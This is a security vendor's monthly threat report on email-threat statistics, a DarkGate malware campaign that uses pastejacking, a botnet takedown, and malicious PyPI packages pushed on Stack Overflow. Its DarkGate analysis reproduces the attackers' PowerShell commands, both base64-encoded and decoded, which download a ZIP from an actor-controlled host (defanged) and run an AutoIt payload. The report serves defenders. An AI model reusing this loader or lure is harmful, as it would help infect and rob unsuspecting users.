Monthly Threat Report June 2024: New Threat Campaigns Involving Darkgate

Written by Security Lab / 07.06.2024 /
Home » Blog » Monthly Threat Report June 2024: New Threat Campaigns Involving Darkgate

Introduction

The Monthly Threat Report by Hornetsecurity brings you monthly insights into M365 security trends, email-based threats, and commentary on current events in the cybersecurity space. This edition of the Monthly Threat Report focuses on data from the month of May.

Executive Summary

  • Email-based threats increased over the past month, with most of the increase being attributed to an increase in easily detectable, low-effort spam messages.
  • Malicious file attachment use increased during this data period with archive files alone seeing a 13.2 percentage point increase in usage.
  • All business verticals saw an increase in targeting over the last month with the mining, entertainment, and media industries at the top of the list of most targeted verticals.
  • Fedex and Facebook saw large increases in brand impersonation attempts.
  • The team at Hornetsecurity has observed a new campaign distributing the Darkgate Malware using a technique known as pastejacking. This report contains a detailed deep-dive.
  • The 911 S5 Proxy Botnet was taken down by US Law enforcement and international partners. This is potentially the largest botnet takedown to date.
  • Threat actors are posing as helpful community members on Stackoverflow in an effort to get users to download malicious PyPI packages.

You are currently viewing a placeholder content from Youtube. To access the actual content, click the button below. Please note that doing so will share data with third-party providers.

More Information

Threat Overview

Unwanted Emails By Category

The following table shows the distribution of unwanted emails per category for April 2024 compared to May 2024.

Unwanted Emails By Category

Our findings for this data period show that the overall volume of email-based threats increased over the last month. While there was a slight increase in the amount of emails categorized as “threats” and “AdvThreats” the largest increase, however, is seen in those emails that are categorized as “Rejected”. These are typically low effort email attacks that are easily detected as malicious as explained in the note below.

NOTE: As a reminder, the “Rejected” category refers to mail that Hornetsecurity services rejected during the SMTP dialog because of external characteristics, such as the sender’s identity or IP address. If a sender is already identified as compromised, the system does not proceed with further analysis. The SMTP server denies the email transfer right at the initial point of connection based on the negative reputation of the IP and the sender’s identity.

Other categories in the image are described in the table below:

CategoryDescription
SpamThese emails are unwanted and are often promotional or fraudulent. The emails are sent simultaneously to a large number of recipients.
ThreatThese emails contain harmful content, such as malicious attachments or links, or they are sent to commit crimes like phishing.
AdvThreatAdvanced Threat Protection has detected a threat in these emails. The emails are used for illegal purposes and involve sophisticated technical means that can only be fended off using advanced dynamic procedures.
RejectedOur email server rejects these emails directly during the SMTP dialog because of external characteristics, such as the sender’s identity, and the emails are not analyzed further.
CleanThese emails were free of threats and delivered.

File Types Used in Email Attacks

The following table shows the distribution of file types used in email attacks throughout the data period.

Top File Types in Email Attacks

There was a clear increase in the use of malicious attachments over the last month. Nearly every file type in our top track categories saw a significant increase in malicious use. Archive files saw a 13.2 percentage point increase over the previous month. Malicious HTML files increased by 6.5 percentage points, and surprisingly disk images, and .exes had notable increases as well. Threat actors are known to shift tactics regularly, so it’s not unusual to see a change in attack types (leveraging more file attachments in this case). As always we will continue to monitor this and call out any specific attack campaigns that are found to be driving these increases.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median). Different organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Industry Email Threat Index

After we observed reductions in threats last month, we’ve seen the opposite during this data period. There has been a near universal increase in industry vertical targeting over the last month showing that attacks against all industries have increased. This aligns with our overall findings that the number of email-based threats has increased during the month of May. That said, the research and entertainment industries saw the largest increases with the mining, entertainment and media industries coming in at the top of this list. It’s clear in our data that while some verticals are targeted than more, the sad truth is it doesn’t matter what type of organization you are. If you have the ability to pay a ransom, you are a target.

Impersonated Company Brands and Organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

Impersonated Brands

The most impersonated brand used in email-based attacks during the data period was clearly Fedex. This shipping brand saw a massive increase in impersonation attempts over the last month. Facebook also saw a significant increase in the amount of email threats impersonating it’s brand.

Recent Threat Findings from Hornetsecurity Regarding Darkgate Pastejacking

Introduction

Vade’s Threat Intelligence and Response Center – (now part of Hornetsecurity!) recently observed a number of malicious phishing campaigns distributing Darkgate using an unusual technique called Pastejacking. DarkGate is a sophisticated and evolving malware family primarily, first documented in 2018, and used for information stealing and remote access capabilities and known to employ advanced evasion techniques to avoid detection by antivirus software and other security measures.

NOTE: The below analysis contains many defanged URLs (hxxps instead of https). This is done to protect the reader from accidental clicks. It goes without saying that this documentation is provided for research purposes, and you should NOT attempt to utilize the below URLs in any way unless you’re a trained security professional. Hornetsecurity is not liable for any damage arising from the use of this information.

The Campaign

During May 27 and 28, a total of 105,640 phishing emails were sent from 17 actor controlled domains.

The emails contain brief sentences designed to create a sense of urgency or authority, urging the receiver to open the malicious attachment under the pretext of needing to review or complete a document. These sentences exhibit classic phishing techniques commonly used by threat actors.

Phishing email pretexting an unpaid bill
Phishing email pretexting an unpaid bill

An HTML document named clarify_27-May\_{6 random digits}.html or Scanned_05_28-2024_\_{6 random digits}.html is attached. When opened, the page displays a fake Microsoft OneDrive folder with a loading circle, attempting to convince the victim that a PDF called “Reports.pdf” is opening.

A fake OneDrive folder loading circle
A fake OneDrive folder loading circle

After 2 seconds, the loading GIF is hidden, and an error message appears stating that the document couldn’t be opened due to a connection error. According to the message, the DNS cache should be updated manually to fix this error.

 A connection error requires the DNS cache to be updated
A connection error requires the DNS cache to be updated

Due to an event listener on the document, when any part of the page is clicked outside the error box, an alert is shown with the message:

Failed to connect to the “OneDrive” cloud service.

The “Details” button redirects to the official Microsoft documentation on how to troubleshoot issues on DNS servers.

When the “How to fix” button is clicked, a new message appears.

A message explaining how to fix the DNS error
A message explaining how to fix the DNS error

This message is prompting the victim to open a Windows terminal or PowerShell console and paste the clipboard content.

In the backend, when the button is clicked, the JJ JavaScript function is called which copies the web page’s title content, previously decoded by the atob function, to the clipboard thanks to the now-deprecated exeCommand(“copy”) method. This technique is referred as Pastejacking.

Der Inhalt des Titels wird dekodiert und in die Zwischenablage kopiert
The title’s content is decoded and copied to the clipboard

If an unsuspecting victim adheres to the instructions, the following commands are executed:

ipconfig /flushdns
$base64 = "JGppID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJG5lID0gI mM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVB hdGggJG5lOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkamkgLU91dEZpbGUgJG5lXHBsLnppc DsNCkNsZWFyLUhvc3Q7DQpFeHBhbmQtQXJjaGl2ZSAkbmVccGwuemlwIC1Gb3JjZSAtZGVzdGl uYXRpb25wYXRoICRuZTsNClJlbW92ZS1JdGVtIC1QYXRoICRuZVxwbC56aXA7DQpTdGFydC1Qc m9jZXNzICRuZVxBdXRvaXQzLmV4ZSAkbmVcc2NyaXB0LmEzeA0KW1N5c3RlbS5SZWZsZWN0aW9 uLkFzc2VtYmx5XTo6TG9hZFdpdGhQYXJ0aWFsTmFtZSgiU3lzdGVtLldpbmRvd3MuRm9ybXMiK TsNCltTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94XTo6U2hvdygiVGhlIG9wZXJhdGl vbiBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5LCBwbGVhc2UgcmVsb2FkIHRoZSBwYWdlIiwgIlN5c 3RlbSIsIDAsIDY0KTsNCkNsZWFyLUhvc3Q7DQo=";
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Str ing($base64)));
Set-Clipboard -Value " ";
exit;

The first command clears the DNS resolver cache, forcing the computer to discard any stored DNS entries and fetch new ones from the DNS server. This command doesn’t do anything malicious; it’s only here in an effort to trick the victim into thinking that the fake DNS problem is being resolved.

Next, a base64 string is decoded and executed thanks to the iex PowerShell cmdlet.

Finally, the clipboard is “cleaned” by setting its value to four spaces.

When decoded, the $base64 variable reveals a malicious PowerShell script:

$ji = "hxxps://kostumn1.ilabserver.com/1.zip";
$ne = "c:\\downloads";
New-Item -ItemType Directory -Force -Path $ne;
Invoke-WebRequest -Uri $ji -OutFile $ne\pl.zip;
Clear-Host;
Expand-Archive $ne\pl.zip -Force -destinationpath $ne;
Remove-Item -Path $ne\pl.zip;
Start-Process $ne\Autoit3.exe $ne\script.a3x
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
[System.Windows.Forms.MessageBox]::Show("The operation completed
successfully, please reload the page", "System", 0, 64);
Clear-Host;

When executed, this script downloads a ZIP document called 1.zip from a remote server, saves it in the c:folder, unzips the content and deletes the previously downloaded ZIP. Then, to perform the infection, it runs Autoit3.exe with script.a3x as an argument.

Finally, “The operation completed successfully, please reload the page” is displayed in a message box.

1.Zip-Inhalt
1.zip content

AutoIt3.exe is the executable for the AutoIt scripting language, which is designed for automating the Windows GUI and general scripting. As previously documented by researchers, DarkGate commonly uses AutoIt scripts as part of its initial infection routine.

The URL has activity attributed to the DarkGate malware
The URL has activity attributed to the DarkGate malware

Read the full technical details HERE

Other Major Incidents and Industry Events

The bulk of our commentary this month focused on the Darkgate pastejacking findings. That said, there have been some other major items in the industry from the last month that are worth noting.

The 911 S5 Proxy Botnet Takedown

United States law enforcement officials along with international partners conducted one of the largest botnet takedowns on record. FBI Director Christopher Wray is quoted as saying:

Working with our international partners, the FBI conducted a joint, sequenced cyber operation to dismantle the 911 S5 Botnet—likely the world’s largest botnet ever.

The botnet was known to encompass more than 19 million unique IP addresses and was distributed via a number of VPN applications including:

  • MaskVPN
  • DewVPN
  • PaladinVPN
  • ProxyGate
  • ShieldVPN
  • ShineVPN

While it’s well known that botnets are used for illegal activity, the 911 S5 botnet was used for some extremely bad stuff. The botnet is known to be used for a number of crimes including fraud, bomb threats, child exploitation, harassment, and others.

The botnet’s main operator was also arrested as part of the takedown as well, increasing the chances that the botnet will stay gone post-takedown.

“Helpful” Stackoverflow Users are Pointing People Towards Malicious Packages

Community assistance is one of the things that makes the tech industry so amazing. There is no shortage of people will to help with a technical issue, or provide advice. Sadly, threat actors know this is the case, and will always look to inject themselves into a conversation with the end goal of launching an attack.

There has been an ongoing effort with this style of attack happening on Stackoverflow recently. Threat actors are posing as “helpful” community users and guiding people to download and make use of malicious PyPI packages. The PyPI repository is an open source repo for packages people can use to help assist in their Python projects. The repo has been dealing with malicious packages for some time now, and it doesn’t look to be slowing down given the recent news.

It goes without saying, when you find what appears to be a fix, or helpful advice in online communities, verify and do a risk assessment of the proposed solution before implementation. 10 minutes of investigation prior to implementation can save your organization a whole load of trouble.


Monthly Recommendations

  • If your organization makes use of Fedex services regularly, train relevant staff on spotting the ever increasing amounts of Fedex brand impersonation emails. A trusted security awareness service can assist with this!
  • Read the details of the Darkgate attack methods we show above and adjust your security posture as needed. If you’re in need of powerful, next-gen email security software, we’ve got you covered.
  • If your organization is leveraging software from any online, public repository, take the time to review that repository and do a risk assessment. Threat-actors are increasingly using public software repos for malicious purposes.

About Hornetsecurity

Hornetsecurity is a leading global provider of next-generation cloud-based security, compliance, backup, and security awareness solutions that help companies and organisations of all sizes around the world. Its flagship product, 365 Total Protection, is the most comprehensive cloud security solution for Microsoft 365 on the market. Driven by innovation and cybersecurity excellence, Hornetsecurity is building a safer digital future and sustainable security cultures with its award-winning portfolio. Hornetsecurity operates in more than 120 countries through its international distribution network of 12,000+ channel partners and MSPs. Its premium services are used by more than 75,000 customers.

You might also be interested in: